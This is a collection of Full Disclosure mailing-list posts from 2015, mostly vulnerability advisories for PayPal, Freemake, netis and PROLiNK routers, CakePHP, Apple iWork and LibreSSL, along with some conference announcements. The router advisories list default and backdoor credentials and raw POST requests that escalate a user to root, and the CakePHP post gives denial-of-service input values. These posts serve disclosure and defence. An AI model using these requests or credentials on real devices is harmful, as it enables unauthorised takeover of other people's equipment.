[FD] PayPal Inc Bug Bounty #117 - Session Fixation Vulnerability
Document Title: === PayPal Inc Bug Bounty #117 - Session Fixation Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1509 EIBBP-31983 (P2) Video: http://www.vulnerability-lab.com/get_content.php?id=1615 Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/10/09/paypal-inc-bug-bounty-117-filter-bypass-remote-session-fixation-vulnerability Release Date: = 2015-10-09 Vulnerability Laboratory ID (VL-ID): 1509 Common Vulnerability Scoring System: 4.3 Product & Service Introduction: === PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract Advisory Information: == The Vulnerability Laboratory Core Research Team discovered a session fixation web Vulnerability in the official PayPal Inc (France) online service web-application. Vulnerability Disclosure Timeline: == 2015-06-06: Researcher Notification & Coordination (Hadji Samir - Evolution Security GmbH) 2015-06-08: Vendor Notification (PayPal Inc - Security & Bug Bounty Team) 2015-07-04: Vendor Response/Feedback (PayPal Inc - Security & Bug Bounty Team) 2015-09-30: Vendor Fix/Patch (PayPal Inc - Developer Team) 2015-10-08: Security Reward (PayPal Inc - Bug Bounty Team) [3.000$] 2015-10-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): PayPal Inc Product: PayPal - Online Service Web Application 2015 Q2 Exploitation Technique: === Remote Severity Level: === Medium Technical Details & Description: A session fixation web vulnerability has been discovered in the official PayPal Inc online service web-application. The vulnerability allows remote attackers to manipulate user session information to takeover the data for malicious purpose. Data enters a web application through an untrusted source, most frequently an HTTP request. The data is included in an HTTP response header sent to a web user without being validated for malicious characters. HTTP response splitting is a means to an end, not an end in itself. At its root, the attack is straightforward: an attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header. To mount a successful exploit, the application must allow input that contains CR (carriage return, also given by %0d or /r) characters into the header AND the underlying platform must be vulnerable to the injection of such characters. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allow them to create additional responses entirely under their control. On th
[FD] Freemake Video Downloader 3.7.1 - Code Execution Vulnerability
Document Title: === Freemake Video Downloader 3.7.1 - Code Execution Vulnerability References (Source): http://www.vulnerability-lab.com/get_content.php?id=1617 Release Date: = 2015-10-12 Vulnerability Laboratory ID (VL-ID): 1617 Common Vulnerability Scoring System: 8.8 Product & Service Introduction: === Freemake YouTube Downloader is a free software to download online videos to PC free and fast. Download videos from YouTube, Facebook, Dailymotion, Vevo, Vimeo, and 10,000+ sites. You can grab any streaming video in original quality or convert it to MP3, AVI, MKV, WMV, 3GP, or for iPhone, iPod, PSP, Android. Easy setup, no fees, no signup, no limitations. (Copy of the Vendor Homepage: http://www.freemake.com/free_video_downloader/ ) Abstract Advisory Information: == An independent vulnerability laboratory researcher discovered a code execution vulnerability in the official FreemakeVideoDownloader v3.7.1 software. Vulnerability Disclosure Timeline: == 2015-10-12: Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): Freemake Product: Freemake Video Downloader - Software (Windows) 3.7.1 Exploitation Technique: === Local Severity Level: === High Technical Details & Description: A code execution web vulnerability has been discovered in the official FreemakeVideo Converter v4.1.7 software. The vulnerability allows an attacker to execute malicious codes by interaction with a vulnerable software input field. The security vulnerability is present in the `paste url` module of the software. The download module does not filter the file type .php and thus finally allows an attacker to execute for example the calculator. The vulnerability can be exploited by local attackers without interaction. The severity of the issue is high and the bug can be exploited because of a misconfigured file validation mechanism. The security risk of the code execution vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.8. Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the software vulnerability results in system compromise by a classic url code execution. Vulnerable Module(s): [+] Download Vulnerable Input(s): [+] paste url Affected Module(s): [+] .php Proof of Concept (PoC): === The code execution vulnerability can be exploited by local attackers with restricted system user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Launch your browser and paste your malicious link in your url input field (Do not process to open your link yet!) 2. Run Freemake VideoDownloader.exe 3. Click paste url 4. The php code executes successful after usage of the url paste 5. Successful reproduce of the code execution vulnerability! PoC: Exploit Security Risk: == The security risk of the code execution web vulnerability in the software core is estimated as high. (CVSS 8.8) Credits & Authors: == ZwX - (http://zwx.fr) [ http://www.vulnerability-lab.com/show.php?user=ZwX ] Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact:ad...@vulnerability-lab.com - resea...@vulnerability-lab.com- ad...@evolution-sec.com Section:magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab
[FD] Unicorn CPU Emulator Framework is out!
Greetings, Two months after our Blackhat USA talk, we are excited to announce the first release, version 0.9, of Unicorn Engine, the multi-arch, multi-platform CPU emulator framework you are all longing for! Unicorn CPU emulator offers some unparalleled features: - Multi-architectures: Arm, Arm64 (Armv8), M68K, Mips, PowerPC, Sparc, & X86 (include X86_64). - Clean/simple/lightweight/intuitive architecture-neutral API. - Implemented in pure C language, with bindings for Python, Java, Go & .NET available. - Native support for Windows & *nix (with Mac OSX, Linux, *BSD & Solaris confirmed). - High performance by using Just-In-Time compiler technique. - Support fine-grained instrumentation at various levels. - Thread-safe by design. - Distributed under open source license GPL. For further information, see our website at http://www.unicorn-engine.org Unicorn is a very young project, but we do hope that it will live a long life. The community support will be critical for this little open source framework! We would like show our gratitude to the beta testers for bug reports & code contributions during the beta phase! Their invaluable helps have been tremendous for us to keep this far. Huge thanks go to QEMU project, which Unicorn is based on, and extends much further in its special area. Without the almighty QEMU, Unicorn would not be existent! Our engine aims to lay the ground for innovative works. We look forward to seeing many advanced research & development in the security area built on this framework. Let the fun begin! Thanks, Quynh ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] hackercon berlin: hack4 the year is 2015
Hi folks and gentlehackers, as this year is almost over, what could be nicer than spending some time in Berlin and listening to the packets? We are happy to announce the 2015 hack4 in Berlin. What are we looking for? Basically for practical technical talks and cool people. Topics we want to cover: * Malware Coding (elf / pe) * Distributed Networks * Sort of exploitation(stack/heap/win/*nix) * Database tricks(e.g. mysql/postgres/oracle pwnage) * Neat language intros (prefered python, c, assembly ;)) * Rootkits (userland, kernelland...bios) * Bughunting * Debugger/disassembler usage (gdb, ollydb, ida) * You name it! When? 28.12.2015 - 29.12.2015 Where? Berlin Location? Tba You want to join? regis...@hack4.org You want to do a talk? ta...@hack4.org You want to help and keep the con going? h...@hack4.org Con website: http://www.hack4.org ch33rs dash signature.asc Description: This is a digitally signed message part. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] netis RealTek wireless router / ADSL modem Multiple Vulnerabilities
# Exploit Title: [netis RealTek wireless router / ADSL modem Multiple Vulnerabilities] # Discovered by: Karn Ganeshen # Reported on: [October 13, 2015] # Vendor Response: [Vulnerability? What's this?] # Vendor Homepage: [www.netis-systems.com] # Version Affected: [Firmware version RTK v2.1.1] **Vulnerability Details** * 1. Default, weak passwords for http and ftp services * a. *HTTP accounts* - guest/guest - user/user - guest/airocon * -> last four digits of MAC address * b. *FTP accounts* - admin/admin - useradmin/useradmin - user/user 2. *Backdoor accounts* The device comes configured with privileged, backdoor account. For HTTP, 'guest' with attribute , is the backdoor account. This is seen in the config file: This user is not shown / visible in the user list when logged in as guest (privileged user). 3. *No CSRF protection* There is no CSRF token set in any of the forms / pages. It is possible to silently execute HTTP requests if the user is logged in. 4. *Weak RBAC controls * 5a) *A non-root/non-admin user (user) can create and delete any other users, including root-privileged accounts. * In netis RealTek wireless router ADSL modem, there are three users: guest:guest -> priv 2 is super user account with full functional access user:user -> priv 0 -> can access only some functions guest:airocon -> privileged backdoor login *Normally: * - user can create new account with restricted user privs only. - user can change its password and only other non-root users. - user can delete any other non-root users. However, the application does not enforce strict rbac and it is possible for a non-root user to create a new user with root privileges. This is done as follows: 1. Start creating a new user, and intercepting the user creation POST request 2. Intercept & Change privilege parameter value from 0 (user) to 2 (root) - Submit request 3. When the new root user is created successfully, it does not show up in user list 4. Confirm via logging in as new root, and / or configured accounts in configuration file (config.img) This is the POST request to create a new user: *Create user http request*: POST /form2userconfig.cgi HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http:///userconfig.htm?v= Cookie: SessionID= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 115 username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm= *Note1*: In some cases, this password change function is not accessible to 'user' via GUI. But we can still send a POST request to create a valid, new root privileged account. *Note2*: In some cases, application does not create root priv user, in the first attempt. However, in the 2nd or 3rd attempt, new user is created without any issue. *Delete user http request:* A non-root/non-admin user can delete any configured user(s) including privileged users (guest). POST /form2userconfig.cgi HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http:///userconfig.htm Cookie: SessionID= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 131 username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm% In case (non-root) user is deleting a root login (guest, priv 2), action status can be confirmed by checking the configuration In case (non-root) user is deleting a user login (priv 0), action status can be confirmed by checking the user list. 5b) *(non-root priv) User can access unauthorized functions.* Normally, 'user' does not have access to all the functionality of the device. It has access to Status, Setup and Maintenance. However, few functions can still be accessed by calling them directly. For example, to access the mac filtering configuration this url can be opened directly: http:///fw-macfilter.htm Other functions may also be accessible in this manner. 6. *Sensitive information not secured from low privileged users * A non-root / non-admin privileged user has access to download the configuration file - config.img. This file contains clear-text passwords, keys and other sensitive information which can be used to gain privileged access. 7. *Sensitive information accessible in clear-text* Sensitive Information like passwords and keys are not secured properly. Mostly these are either shown in clear-text or cen censored *, it is possible to view clear-text values by 'Inspect Element' locally or intercepting http requests, or sniffing. --
[FD] PROLiNK H5004NK ADSL Wireless Modem Multiple Vulnerabilities
# Exploit Title: [PROLiNK H5004NK ADSL Wireless Modem Multiple Vulnerabilities] # Discovered by: Karn Ganeshen # Reported on: [October 13, 2015] # Vendor Response: [No process to handle vuln reports] # Vendor Homepage: [ http://www.prolink2u.com/newtemp/datacom/adsl-modem-router/381-h5004nk.html] # Version Affected: [Firmware version R76S Slt 4WNE1 6.1R] **Vulnerability Details** *1. Default, weak passwords for http and ftp services * a. *HTTP accounts* - admin/password - user/user - guest/airocon * -> last four digits of MAC address * b. *FTP accounts* - admin/admin - useradmin/useradmin - user/user 2. *Backdoor accounts* The device comes configured with privileged, backdoor account. For HTTP, 'guest' with attribute , is the backdoor account. This is seen in the config file: This user is not shown / visible in the user list when logged in as admin (privileged user). 3. *No CSRF protection* There is no CSRF token set in any of the forms / pages. It is possible to silently execute HTTP requests if the user is logged in. 4. *Weak RBAC controls * 5a) *A non-admin user (user) can create and delete any other users, including root-privileged accounts. * There are three users: admin:password -> priv 2 is super user account with full functional access (admin/root) user:user -> priv 0 -> can access only some functions (user) guest:airocon -> privileged backdoor login *Normally: * - user can create new account with restricted user privs only. - user can change its password and only other non-admin users. - user can delete any other non-admin users. However, the application does not enforce strict rbac and it is possible for a non-admin user to create a new account with admin privileges. This is done as follows: 1. Start creating a new user, and intercepting the user creation POST request 2. Intercept & Change privilege parameter value from 0 (user) to 2 (admin) - Submit request 3. When the new admin user is created successfully, it does not show up in user list 4. Confirm via logging in as new admin, and / or configured accounts in configuration file (config.img) This is the POST request to create a new user: *Create user http request*: POST /form2userconfig.cgi HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http:///userconfig.htm?v= Cookie: SessionID= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 115 username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm= *Note1*: In some cases, this password change function is not accessible to 'user' via GUI. But we can still send a POST request to create a valid, new higher privileged account. *Note2*: In some cases, application does not create admin priv user, in the first attempt. However, in the 2nd or 3rd attempt, new user is created without any issue. *Delete user http request:* A non-admin user can delete any configured user(s) including privileged users (admin). POST /form2userconfig.cgi HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http:///userconfig.htm Cookie: SessionID= Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 131 username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm% In case (non-admin) user is deleting the admin login (priv 2), action status can be confirmed by checking the configuration. In case (non-admin) user is deleting another user login (priv 0), action status can be confirmed by checking the user list. 5b) *(non-admin priv) User can access unauthorized functions.* Normally, 'user' does not have access to all the functionality of the device. It has access to Status, Setup and Maintenance. However, few functions can still be accessed by calling them directly. For example, to access the mac filtering configuration this url can be opened directly: http:///fw-macfilter.htm Other functions may also be accessible in this manner. 6. *Sensitive information not secured from low privileged users * A non-admin privileged user has access to download the configuration file - config.img. This file contains clear-text passwords, keys and other sensitive information which can be used to gain privileged access. 7. *Sensitive information accessible in clear-text* Sensitive Information like passwords and keys are not secured properly. Mostly these are either shown in clear-text or cen censored *, it is possible to view clear-text values by 'Inspect Element' locally or intercepting
[FD] UISGCON11 CFP
Hello On behalf of UISGCON11 Organization Committee I would like to invite all persons who want to participate in our annual Ukrainian InfoSec conference, CFP is open for submission. UISGCON11 will be held on December, 4 in Kyiv, Ukraine, Hotel Bratislava . Website of the event - https://11.uisgcon.org/en To submit the paper, please fill in the form at https://11.uisgcon.org/en/call-papers or e-mail directly to ta...@uisgcon.org. Annual conferences of Ukrainian Information Security Group gather in Kyiv the capital of Ukraine hundreds of Ukrainian and international experts in information security to discuss the most acute problems of the industry. As you know, one of the most relevant challenges of the present is the information war against Ukraine's aspirations for freedom and independence. This war is happening not only in social networks and on TV, but also in telecommunication networks and cyber-environment. These and many other topics will be discussed by recognized gurus and students, journalists and hackers, CTO/CISO and system administrators. Please take part in biggest information security conference in Ukraine and be a speaker of UISGCON. See you soon! -- Thank you, Andrey Loginov UISGCON11 Coordinator ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CakePHP Xml class SSRF Vulnerability
=
Title : CakePHP Xml class SSRF Vulnerability
CVE Number : N/A (not assigned)
Affected Software : Confirmed on CakePHP v3.0.5 (prior versions may
also be affected)
Credit : Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
http://www.mbsd.jp/
Issue Status : v3.0.6/2.6.6 was released which fixes this issue
=
Overview:
-
CakePHP is an open-source web application framework for PHP.
CakePHP (v3.0.5) was confirmed to be vulnerable to SSRF (Server Side
Request Forgery) attacks. Remote attacker can utilize it for at least
DoS (Denial of Service) attacks, if the target application accepts
XML as an input. It is caused by insecure design of Cake's Xml class.
Details:
-
Here is an abstract from Cake\Utility\Xml.php (v3.0.3).
96: public static function build($input, array $options = [])
97: {
104: if (is_array($input) || is_object($input)) {
105: return static::fromArray($input, $options);
106: }
107:
108: if (strpos($input, '<') !== false) {
109: return static::_loadXml($input, $options);
110: }
111:
112: if (file_exists($input)) {
113: return static::_loadXml(file_get_contents($input), $options);
114: }
The problematic part is line 112-114, where $input is treated as a
URL (file path) and the method tries to fetch the content of the URL,
if it does not contain any '<' character.
Therefore, if values such as those shown below are given to it,
the application will block.
1. file:///dev/random
-> blocks permanently (until so much entropy supplied)
2. /dev/urandom
-> blocks until hitting memory limit
3. ftp://very_slow_host/a
-> blocks until socket timeout
Attackers can exhaust MaxClients (on Apache), just by sending
the number of requests with these values instead of normal XML.
CakePHP seems to accept XML inputs when RequestHandlerComponent,
which is designed to handle XHR requests that may contain XML or
JSON in their body, is enabled.
http://book.cakephp.org/3.0/en/development/rest.html
http://book.cakephp.org/3.0/en/controllers/components/request-handling.html
When the component is enabled and a request has necessary headers
(Content-Type and X-Requested-With), raw body of the request is
passed to Xml::build() directly (i.e. without validation), which
can obviously be used for attacks.
However, it seems hard to successfully conduct other types of
attack than DoS, because there are some hurdles for attackers.
Firstly, usual web applications are unlikely to return the full
request data. This means there is very little opportunity for file
theft attacks, regardless of whether the target file is XML or not.
The second hurdle is file_exists() check in line 112, which results
in URLs with interesting schemes like "expect" and "http" being
rejected.
But still DoS and timing attacks like internal network scan using
ftp URL's are possible. Additionally, in CakePHP v2, attackers can
also use http(s) URLs for such attacks, as Cake2 accepts URLs with
these schemes.
Timeline:
-
2015/05/27 Reported to CakePHP Security ML
2015/05/29 Vender announced v3.0.6 & 2.6.6
2015/10/15 Disclosure of this advisory
Recommendation:
-
Upgrading to the latest versions is recommended, if your app
accepts XML data, as stated in the release note.
https://github.com/cakephp/cakephp/releases/tag/3.0.6
One thing I think should be noted is that the default behavior
of the method (Xml::build()) was kept as it had been, in order to
avoid compatibility problems.
https://github.com/cakephp/cakephp/commit/2cde19f24c3679e8162e3abbce73818a8b0c02a0
This means you need to modify your program, if you pass untrusted
data to the method in your own program code to deal with XML.
Technically, specifying a newly created option (readFile = false)
for the method disables URL loading feature, thus can prevent DoS
and other relevant attacks. See the URL above (github commit log)
for details.
--
Takeshi Terada
Mitsui Bussan Secure Directions, Inc.
http://www.mbsd.jp/
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] APPLE-SA-2015-10-15-1 Keynote 6.6, Pages 5.6, Numbers 3.6, and iWork for iOS 2.6
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 APPLE-SA-2015-10-15-1 Keynote 6.6, Pages 5.6, Numbers 3.6, and iWork for iOS 2.6 Keynote 6.6, Pages 5.6, Numbers 3.6, and iWork for iOS 2.6 are now available which address the following: Keynote, Pages, and Numbers Available for: OS X Yosemite v10.10.4 or later, iOS 8.4 or later Impact: Opening a maliciously crafted document may lead to compromise of user information Description: Multiple input validation issues existed in parsing a maliciously crafted document. These issues were addressed through improved input validation. CVE-ID CVE-2015-3784 : Bruno Morisson of INTEGRITY S.A. CVE-2015-7032 : Behrouz Sadeghipour (@Nahamsec) and Patrik Fehrenbach (@ITSecurityguard) Keynote, Pages, and Numbers Available for: OS X Yosemite v10.10.4 or later, iOS 8.4 or later Impact: Opening a maliciously crafted document may lead to unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in parsing a maliciously crafted document. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7033 : Felix Groebert of the Google Security Team Pages Available for: OS X Yosemite v10.10.4 or later, iOS 8.4 or later Impact: Opening a maliciously crafted Pages document may lead to unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in parsing a maliciously crafted Pages document. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7034 : Felix Groebert of the Google Security Team Keynote 6.6, Pages 5.6, Numbers 3.6, and iWork for iOS 2.6 may be obtained from the App Store. Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -BEGIN PGP SIGNATURE- Comment: GPGTools - http://gpgtools.org iQIcBAEBCAAGBQJWIChpAAoJEBcWfLTuOo7tm6wP/A7VLym8s1mxvtZtkL6rlP9G LDuDKD6Q+ukd4EU41unLvgJC3DrC5XmJKBySrReX7hLBbHMElCFOa971+GVZl4aE 9gbX3zJvNf9uIzP3VSpmYw1tIdZVXr275ypdG+Nlc1YBCpcdMD6ohD9dJD1zdG8l ieuEvRFFUFGdgtIk5PO6YKHstYFkcQbbmt/uy61y3CglIDWyPOeJ7m6DWlCPYB3I PtY82ust1XPpJT0WSH3sfLyhluoq89VFPmiZhwDnOUopWuLmNoLntoQFnbCnRNwd 5nGzjukKGe8eQQ5guZP8wo+t57Rz37povvDWOXxvuk2mjjr0+ejQpRk+c7/4aIkX Uyz4nW4DGCEjXDA8/yT5HXWHb7m28WehV5fnUiNVkl0PltwLY5nlSk29sD2BMiT6 DY3KUXT6ppZxqVMm3HEzM3VQKD5kfiFJkzXx1QtOzx4mAyTUKqN98Ni7ijf/O7CI xjyNOCBNcMRtqA0ySUncvMiCeRo1b7Y2hthqY6GtmRjKbq2D8ooZyiEHGv6E10g1 Hn46jPJWPKcOMudszPUc2/AIaj94+Xb7Esq3wUSkz5e7c068oxUFBZLjVDeH8P8i /3AUN6OXLVoGCkQvdv0kvsmQDsTJqq3iUkBSDSzE5RD8GDYh+cyi+54ZFV7BKhCi ikrC4CqPxEcf3lk6bXKi =Zci4 -END PGP SIGNATURE- ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Re: [FD] Watch your Downloads: the risk of the "auto-download" feature on Microsoft Edge and Google Chrome
On Mon, Oct 12, 2015 at 7:20 AM, Stefan Kanthak wrote: > > > Right. > And that's why it's ABSOLUTELY necessary to educate EVERY Windows user: Any solution that requires personally talking to 7 billion people and achieving 100% understanding and compliance is not even in theory workable. Oops, 7 billion and one; they made another one while I was typing this. Oops, 7 billion and two; they made another one while you were reading it. This has to be fixed in the OS. ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Qualys Security Advisory - LibreSSL (CVE-2015-5333 and CVE-2015-5334)
Qualys Security Advisory
LibreSSL (CVE-2015-5333 and CVE-2015-5334)
Contents
Summary
Memory Leak (CVE-2015-5333)
Buffer Overflow (CVE-2015-5334)
Acknowledgments
Summary
In order to achieve remote code execution against the vulnerabilities
that we recently discovered in OpenSMTPD (CVE-2015-7687), a memory leak
is needed. Because we could not find one in OpenSMTPD itself, we started
to review the malloc()s and free()s of its libraries, and eventually
found a memory leak in LibreSSL's OBJ_obj2txt() function; we then
realized that this function also contains a buffer overflow (an
off-by-one, usually stack-based).
The vulnerable function OBJ_obj2txt() is reachable through
X509_NAME_oneline() and d2i_X509(), which is called automatically to
decode the X.509 certificates exchanged during an SSL handshake (both
client-side, unless an anonymous mode is used, and server-side, if
client authentication is requested).
These vulnerabilities affect all LibreSSL versions, including LibreSSL
2.0.0 (the first public release) and LibreSSL 2.3.0 (the latest release
at the time of writing). OpenSSL is not affected.
Memory Leak (CVE-2015-5333)
OBJ_obj2txt() converts an ASN.1 object identifier (the ASN1_OBJECT a)
into a null-terminated string of numerical subidentifiers separated by
dots (at most buf_len bytes are written to buf).
Large subidentifiers are temporarily stored in a BIGNUM (bl) and
converted by BN_bn2dec() into a printable string of decimal characters
(bndec). Many such bndec strings can be malloc()ated and memory-leaked
in a loop, because only the last one will be free()d, after the end of
the loop:
489 int
490 OBJ_obj2txt(char *buf, int buf_len, const ASN1_OBJECT *a, int no_name)
491 {
...
494 char *bndec = NULL;
...
516 len = a->length;
...
519 while (len > 0) {
...
570 bndec = BN_bn2dec(bl);
571 if (!bndec)
572 goto err;
573 i = snprintf(buf, buf_len, ".%s", bndec);
...
598 }
...
601 free(bndec);
...
609 }
This memory leak allows remote attackers to cause a denial of service
(memory exhaustion) or trigger the buffer overflow described below.
Buffer Overflow (CVE-2015-5334)
As a result of CVE-2014-3508, OBJ_obj2txt() was modified to "Ensure
that, at every state, |buf| is NUL-terminated." However, in LibreSSL,
the error-handling code at the end of the function may write this
null-terminator out-of-bounds:
489 int
490 OBJ_obj2txt(char *buf, int buf_len, const ASN1_OBJECT *a, int no_name)
491 {
...
516 len = a->length;
517 p = a->data;
518
519 while (len > 0) {
...
522 for (;;) {
523 unsigned char c = *p++;
524 len--;
525 if ((len == 0) && (c & 0x80))
526 goto err;
...
528 if (!BN_add_word(bl, c & 0x7f))
529 goto err;
...
535 if (!bl && !(bl = BN_new()))
536 goto err;
537 if (!BN_set_word(bl, l))
538 goto err;
...
542 if (!BN_lshift(bl, bl, 7))
543 goto err;
...
546 }
...
553 if (!BN_sub_word(bl, 80))
554 goto err;
...
561 if (buf_len > 1) {
562 *buf++ = i + '0';
563 *buf = '\0';
564 buf_len--;
565 }
...
569 if (use_bn) {
570 bndec = BN_bn2dec(bl);
571 if (!bndec)
572 goto err;
573 i = snprintf(buf, buf_len, ".%s", bndec);
574 if (i == -1)
575 goto err;
576 if (i >= buf_len) {
577 buf += buf_len;
578 buf_len = 0;
579 } else {
580 buf += i;
581 buf_len -= i;
582
